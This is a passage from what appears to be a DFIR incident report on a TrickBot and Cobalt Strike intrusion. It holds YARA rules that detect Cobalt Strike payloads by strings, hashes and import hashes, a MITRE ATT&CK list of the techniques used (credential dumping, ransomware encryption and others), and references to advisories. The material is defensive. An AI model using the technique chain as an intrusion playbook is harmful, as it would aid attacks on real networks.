$s10 = "[email protected]" fullword ascii
$s11 = "operator co_await" fullword ascii
$s12 = "GetModuleHandleRNtUnmapViewOfSe" fullword ascii
$s13 = "+GetProcAddress" fullword ascii
$s14 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
$s15 = "RtlExitUserThrebNtFlushInstruct" fullword ascii
$s16 = "Sectigo Limited1$0"" fullword ascii
$s17 = "b<log10" fullword ascii
$s18 = "D*<W -" fullword ascii
$s19 = "WINDOWSPROJECT1" fullword wide
$s20 = "WindowsProject1" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 10000KB and
( pe.imphash() == "555560b7871e0ba802f2f6fbf05d9bfa" or 8 of them )
}rule CS_DLL {
meta:
description = "62.dll"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-07-07"
hash1 = "8b9d605b826258e07e63687d1cefb078008e1a9c48c34bc131d7781b142c84ab"
strings:
$s1 = "Common causes completion include incomplete download and damaged media" fullword ascii
$s2 = "StartW" fullword ascii
$s4 = ".rdata$zzzdbg" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 70KB and ( pe.imphash() == "42205b145650671fa4469a6321ccf8bf" )
or (all of them)
}rule tdr615_exe {
meta:
description = "Cobalt Strike on beachhead: tdr615.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-07-07"
hash1 = "12761d7a186ff14dc55dd4f59c4e3582423928f74d8741e7ec9f761f44f369e5"
strings:
$a1 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$a2 = "I:\RoDcnyLYN\k1GP\ap0pivKfOF\odudwtm30XMz\UnWdqN\01\7aXg1kTkp.pdb" fullword ascii
$b1 = "[email protected]" fullword ascii
$b2 = "operator co_await" fullword ascii
$b3 = "GetModuleHandleRNtUnmapViewOfSe" fullword ascii
$b4 = "RtlExitUserThrebNtFlushInstruct" fullword ascii
$c1 = "Jersey City1" fullword ascii
$c2 = "Mariborska cesta 971" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 10000KB and
any of ($a* ) and 2 of ($b* ) and any of ($c* )
}
MITRE
Phishing: Spearphishing Attachment – T1566.001
Signed Binary Proxy Execution: Regsvr32 – T1218.010
Impair Defenses: Disable or Modify Tools – T1562.001
Domain Trust Discovery – T1482
OS Credential Dumping: LSASS Memory – T1003.001
System Owner/User Discovery – T1033
Command and Scripting Interpreter: PowerShell – T1059.001
Data Staged: Local Data Staging – T1074.001
System Information Discovery – T1082
Account Discovery: Local Account – T1087.001
Account Discovery: Domain Account – T1087.002
OS Credential Dumping: NTDS – T1003.003
Windows Management Instrumentation – T1047
Browser Bookmark Discovery – T1217
Data Encrypted for Impact – T1486
Remote Services: SMB/Windows Admin Shares – T1021.002
MITRE Software
AdFind – S0552
BloodHound – S0521
Cobalt Strike – S0154
Systeminfo – S0096
Net – S0039
Nltest – S0359
Esentutl – S0404
PsExec – S0029
Cmd – S0106
References
TrickBot Malware Alert (AA21-076A), US CERT – https://us-cert.cisa.gov/ncas/alerts/aa21-076a
Advisory: Trickbot, NCSC – https://www.ncsc.gov.uk/news/trickbot-advisory
Trickbot Still Alive and Well, The DFIR Report – https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/
Hunting for GetSystem in offensive security tools, RedCanary – https://redcanary.com/blog/getsystem-offsec/
TrickBot Banking Trojan, ThreatPost – https://threatpost.com/trickbot-banking-trojan-module/167521/
Internal case #4641